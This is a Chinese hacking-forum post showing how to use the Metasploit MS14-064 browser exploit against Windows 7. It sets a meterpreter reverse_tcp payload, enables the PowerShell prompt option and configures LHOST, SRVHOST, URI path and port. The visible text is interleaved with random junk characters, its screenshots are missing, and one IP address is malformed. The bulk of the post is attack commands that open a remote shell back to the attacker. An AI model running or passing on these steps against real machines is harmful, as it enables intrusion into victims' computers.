找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1427|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

( ]% I2 U9 j# S6 } 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示! Y' U1 N9 |8 u* n+ @" [& I0 s/ \

% f: f6 G: i8 Z9 o( ^

; X9 ~6 C7 E2 j1 O& k0 C- ~ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 5 V3 {( r$ N9 s. N3 _) h

4 @. Z! J! h: ?$ m4 T

6 _3 k: Y5 c% p9 V3 Q" Z 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp % b& E+ Q& ?5 [' Z, D# a

) V! M+ }& p% {: {7 F) A% q

- @4 {0 k0 p0 _4 Z* e             set AllowPowershellPrompt true u0 a+ x- Z' \8 {! r

' B1 V8 N4 I" d+ F) ]" i) a

1 T$ ^6 g, E# U. K             Set LHOST 192.168.0.109 : E* k u9 w: p' t/ k9 R) K: E

# M8 w6 ^( H2 _: {3 h. z

8 z/ W4 r1 G: M1 z% e             set SRVHOST 192.168.0.1090 ?3 v% G% w# ~4 c7 e1 D& X

0 U% p& W6 y1 [

' x: i. P c3 W9 E' z) I             Set uripath share# C! C% a) J; d5 ^8 U

% U. g0 U) A8 r, Z

6 M6 i% Y/ {1 Y, H             Set srvport 80 ) A7 v O% Y8 z

# a2 w/ l9 i( k/ |

2 q) ~ y$ p+ w6 [  ) j7 a7 \5 \! ]) u" X, Y

^# `* u- k3 N

, R9 ~+ H% x4 p U% y   0 M7 ?) S q3 A/ u" x: r

0 p; c" h8 Q' f0 j i4 m6 H

$ n U, f# P3 {6 s" J7 s  - f0 f$ W4 r# w5 \' q( R- R `

# e3 k7 i: f# E C

4 K8 J" U0 d3 _$ T3 ]) f   # Z! M: @ [# {

& U$ W2 h+ u8 r! j# P

& |3 a9 N! e/ j6 Y   ! V4 k! h& h2 u1 j# ^! t

3 w8 H `: C- Q9 t

- f! k) |; `3 @5 l G) d 下面我们来访问本地地址如图: 9 c5 F7 r, G5 h6 V$ q

+ l% a. ?& j" `0 m

. k3 {& B4 d0 \2 O. I  ! ]9 b. V- x6 g( C$ y# @

7 e/ \4 G0 `3 S% F

0 f- @- Z S- h. X4 ~9 B1 u* Q   * F _4 k B0 O, O# c, m5 ~& R0 F/ j

2 u1 B+ L G0 z

/ Y+ F% V6 B! x' ` | . t% O5 A: z2 N6 d4 u0 `* m# X

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表